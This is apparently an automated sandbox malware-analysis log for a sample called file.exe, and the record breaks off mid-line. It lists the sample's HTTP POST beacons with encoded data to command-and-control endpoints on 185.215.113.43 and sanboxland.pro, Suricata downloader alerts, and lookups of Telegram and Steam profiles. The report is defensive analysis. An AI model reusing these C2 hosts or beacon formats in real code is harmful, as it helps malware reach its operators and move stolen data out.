Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sanboxland.proContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sanboxland.proContent-Length: 162Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 45 36 31 31 36 44 30 38 39 33 37 30 39 35 36 46 31 45 44 46 46 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 31 45 41 42 42 46 45 39 41 32 45 45 45 45 41 34 44 34 39 46 31 33 44 35 34 38 30 33 42 42 42 37 36 45 37 31 39 39 30 30 32 44 42 43 43 30 43 42 39 35 33 31 30 34 45 42 36 46 44 42 30 33 32 30 43 43 35 46 33 38 42 43 46 44 45 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FE6116D089370956F1EDFF6102794AFA17E4CADC3DDBE1EABBFE9A2EEEEA4D49F13D54803BBB76E7199002DBCC0CB953104EB6FDB0320CC5F38BCFDE
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49847 -> 45.11.183.55:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49864 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49877 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49887 -> 104.21.79.7:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49895 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49917 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49902 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49944 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49977 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50005 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50025 -> 45.155.249.199:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:50018 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:50035 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 45.155.249.199:80 -> 192.168.2.7:50025
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50046 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50061 -> 104.21.79.7:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:50059 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50066 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50041 -> 104.21.35.43:443

Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55
Source: unknown	TCP traffic detected without corresponding DNS query: 45.11.183.55

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00E0E0C0 recv,recv,recv,recv,

0_2_00E0E0C0

Source: global traffic	HTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: zonedw.sbsConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlKHLAQiFoM0BCNy9zQEIj8rNAQi5ys0BCKLRzQEIitPNAQik1s0BCPTWzQEIp9jNAQj5wNQVGPXJzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlKHLAQiFoM0BCNy9zQEIj8rNAQi5ys0BCKLRzQEIitPNAQik1s0BCPTWzQEIp9jNAQj5wNQVGPXJzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=0f16be3cd5b64bfc24_1392832568208400914
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: zonedw.sbsConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /b?rn=1734119253184&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=27D5836E84FB6FA100DF963A85896E2B&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b2?rn=1734119253184&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=27D5836E84FB6FA100DF963A85896E2B&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1F4cc13a9a06a09cf3ed6e51734112725; XID=1F4cc13a9a06a09cf3ed6e51734112725
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1734119253183&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=5ff571afa9e8406fa25abf234ff9d93b&activityId=5ff571afa9e8406fa25abf234ff9d93b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=BEF20EC394EF4A05A49DA5FBE8E211E1&MUID=27D5836E84FB6FA100DF963A85896E2B HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: 